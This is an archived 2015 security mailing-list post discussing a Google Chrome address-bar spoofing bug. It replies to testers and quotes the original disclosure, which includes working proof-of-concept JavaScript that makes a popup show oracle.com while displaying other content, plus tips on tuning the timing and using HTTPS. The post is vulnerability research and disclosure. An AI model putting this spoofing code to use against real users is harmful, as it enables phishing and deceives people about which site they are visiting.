| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <5593ED82.6000806@deusen.co.uk>
Date: Wed, 01 Jul 2015 14:39:14 +0100
From: David Leo <david.leo@...sen.co.uk>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org,
oss-security@...ts.openwall.com
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
http://seclists.org/fulldisclosure/2015/Jun/109
Big Whale said:
"Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works"
"clearly URL spoofing"
Thanks for testing!
http://seclists.org/oss-sec/2015/q3/0
0pc0deFR said:
"Work on Google Chrome Ubuntu"
Bonjour, thanks for testing!
http://seclists.org/oss-sec/2015/q2/824
Daniel Micay said:
"It does display a window with the oracle.com address"
"why you've got an ever increasing number of setTimeout events"
http://seclists.org/oss-sec/2015/q2/823
Alexander E. Patrakov said:
"Looks like a fork bomb"
Thanks for testing!
The number of "setTimeout" does NOT need to be increasing forever.
OK, I admit - we are lazy(it works and we don't touch it anymore)
:-)
http://seclists.org/oss-sec/2015/q3/2
Roney Gomes said:
"it worked on the desktop version of Opera"
Wow! Thanks for letting us know.
Here is the screenshot of Opera
http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png
And Chrome
http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png
(A number is displayed in Chrome's address bar,
not the same as Opera)
http://seclists.org/oss-sec/2015/q2/826
Daniel Micay said:
"it can't always be replicated"
"I've tried it a few times and"
"it fails about as often as it works"
http://seclists.org/oss-sec/2015/q3/4
Valentinas Bakaitis said:
"PoC did not work"
Hey! The trick here is timing:
Please modify those numbers in code - make them smaller.
http://seclists.org/oss-sec/2015/q3/5
Zak Siddiqui said:
"Is it reproducible with HTTPS?"
Yes, we just tried this URL
https://en.wikipedia.org/wiki/Main_Page
It works.
In fact, it works BETTER against HTTPS,
because HTTPS is slower, so timing is easier.
http://seclists.org/oss-sec/2015/q2/825
Florian Weimer said:
"they show the new URL while still displaying old content"
Exactly, that's the cause of this bug.
In the end, allow me to repeat:
No user interaction on the fake page.
But, anyone can do
"BBB Accredited Business"
"PayPal Partner"
etc.
Kind Regards,
PS
We love clever tricks.
We love this:
http://dieyu.org/
On 2015/6/30 7:08, David Leo wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make whitehouse.gov display "We love Islamic State" :-)
>
> Note:
> No user interaction on the fake page.
>
> Code:
> ***** index.html
> <script>
> function next()
> {
> w.location.replace('http://www.oracle.com/index.html?'+n);n++;
> setTimeout("next();",15);
> setTimeout("next();",25);
> }
> function f()
> {
> w=window.open("content.html","_blank","width=500 height=500");
> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
> }
> </script>
> <a href="#" onclick="f()">Go</a><br>
> ***** content.html
> <b>This web page is NOT oracle.com</b>
> <script>location="http://www.oracle.com/index.html";</script>
> ***** It's online
> http://www.deusen.co.uk/items/gwhere.6128645971389012/
> (The page says "June/16/2015" - it works as we tested today)
>
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),
> and the threat is obvious.
> What's your opinion?
>
> Kind Regards,
>
> PS
> We love clever tricks.
> We love this:
> http://dieyu.org/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists